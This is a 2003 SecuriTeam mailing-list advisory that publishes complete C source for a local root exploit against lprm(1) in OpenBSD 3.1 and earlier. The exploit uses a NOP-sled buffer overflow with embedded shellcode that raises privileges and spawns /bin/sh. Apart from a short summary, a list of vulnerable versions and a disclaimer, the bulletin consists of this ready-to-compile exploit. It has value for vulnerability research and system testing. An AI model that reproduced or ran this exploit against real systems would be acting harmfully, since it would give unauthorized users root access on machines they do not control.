[EXPL] OpenBSD lprm(1) Exploit

From: support@securiteam.com
Date: 03/09/03

  • Next message: support@securiteam.com: "[NEWS] Clearswift MAILsweeper MIME Attachment Evasion Issue"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 9 Mar 2003 16:02:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      OpenBSD lprm(1) Exploit
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in OpenBSD's lprm has been found to allow gaining of
    elevated privileges (root), the following is an exploit code that can be
    used by administrators to test their system for the vulnerability.

    DETAILS

    Vulnerable systems:
     * OpenBSD version 3.1 and prior

    Exploit:
    /*
     * lprmexp.c
     *
     * OpenBSD <= 3.1 lprm(1) local root exploit
     *
     * By CMN <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>
     *
     * Tested on OpenBSD 3.0 and 3.1.
     *
     * Fiddle with -a option from 1 to 7 to indent address in
     * buffer.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <sys/types.h>

    #define LPRMPROG "/usr/bin/lprm"
    #define BUFSIZE 511
    #define OFFSET 0
    #define NOP 0x90

    static char obsdcode[] =
        "\x31\xc0" /* xorl %eax, %eax */
        "\x50" /* pushl %eax */
        "\x50" /* pushl %eax */
        "\xb0\xb7" /* movb $0xb7, %al */
        "\xcd\x80" /* int $0x80 */
        "\x31\xc0" /* xorl %eax, %eax */
        "\xb0\x19" /* movb $0x19, %al */
        "\x50" /* pushl %eax */
        "\xcd\x80" /* int $0x80 */
        "\x50" /* pushl %eax */
        "\x50" /* pushl %eax */
        "\x31\xc0" /* xorl %eax, %eax */
        "\xb0\x17" /* movb $0x17, %al */
        "\xcd\x80" /* int $0x80 */
        "\x31\xc0" /* xorl %eax, %eax */
        "\xb0\x2b" /* movb $0x2b, %al */
        "\x50" /* pushl %eax */
        "\xcd\x80" /* int $0x80 */
        "\x50" /* pushl %eax */
        "\x50" /* pushl %eax */
        "\x31\xc0" /* xorl %eax, %eax */
        "\xb0\xb5" /* movb $0xb5, %al */
        "\xcd\x80" /* int $0x80 */
        "\x31\xc0" /* xorl %eax, %eax */
        "\x50" /* pushl %eax */
        "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
        "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
        "\x89\xe3" /* movl %esp, %ebx */
        "\x50" /* pushl %eax */
        "\x53" /* pushl %ebx */
        "\x89\xe2" /* movl %esp, %edx */
        "\x50" /* pushl %eax */
        "\x52" /* pushl %edx */
        "\x53" /* pushl %ebx */
        "\x50" /* pushl %eax */
        "\xb0\x3b" /* movb $0x3b, %al */
        "\xcd\x80" /* int $0x80 */
        "\x31\xc0" /* xorl %eax, %eax */
        "\x40" /* inc %eax */
        "\x50" /* pushl %eax */
        "\x50" /* pushl %eax */
        "\xcd\x80"; /* int $0x80 */

    u_long
    getesp(void)
    {
        __asm__("movl %esp, %eax");
    }

    void
    usage(u_char *pname)
    {
        printf("\n** OpenBSD lprm(1) local root exploit by CMN **\n");
        printf("\nUsage: %s printer [-o offs] [-r ret] [-a indent]\n\n",
            pname);
    }

    int
    main(int argc, char *argv[])
    {
        int i;
        u_char indent = 0;
        u_long raddr = 0;
        u_long offset = 0;
        u_char buf[BUFSIZE+1];

        if (argc < 2) {
            usage(argv[0]);
            exit(1);
        }

        argc--;
        argv++;

        while ( (i = getopt(argc, argv, "a:r:o:")) != -1) {
            switch (i) {
                case 'a':
                    indent = atoi(optarg) % 8;
                    break;

                case 'r':
                    raddr = strtoul(optarg, NULL, 0);
                    break;

                case 'o':
                    offset = strtoul(optarg, NULL, 0);
                    break;

                default:
                    exit(1);
                    break;
            }
        }

        if (!raddr) {
            raddr = getesp();
            raddr -= offset ? offset : OFFSET;
        }
        else
            raddr -= offset;

        printf("Using address 0x%08x\n", raddr);

        memset(buf, NOP, BUFSIZE);
        memcpy(&buf[BUFSIZE-(indent+4)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE-(indent+8)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE-(indent+12)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE-(indent+16)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE-(indent+20)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE-(indent+24)], &raddr, sizeof(raddr));
        memcpy(&buf[BUFSIZE]-(strlen(obsdcode)+100),
                obsdcode, strlen(obsdcode));
        buf[BUFSIZE] = '\0';

        execlp(LPRMPROG, "CMN", "-P", argv[0], buf, buf, NULL);
        exit(1);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cmn@darklab.org> CMN.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: support@securiteam.com: "[NEWS] Clearswift MAILsweeper MIME Attachment Evasion Issue"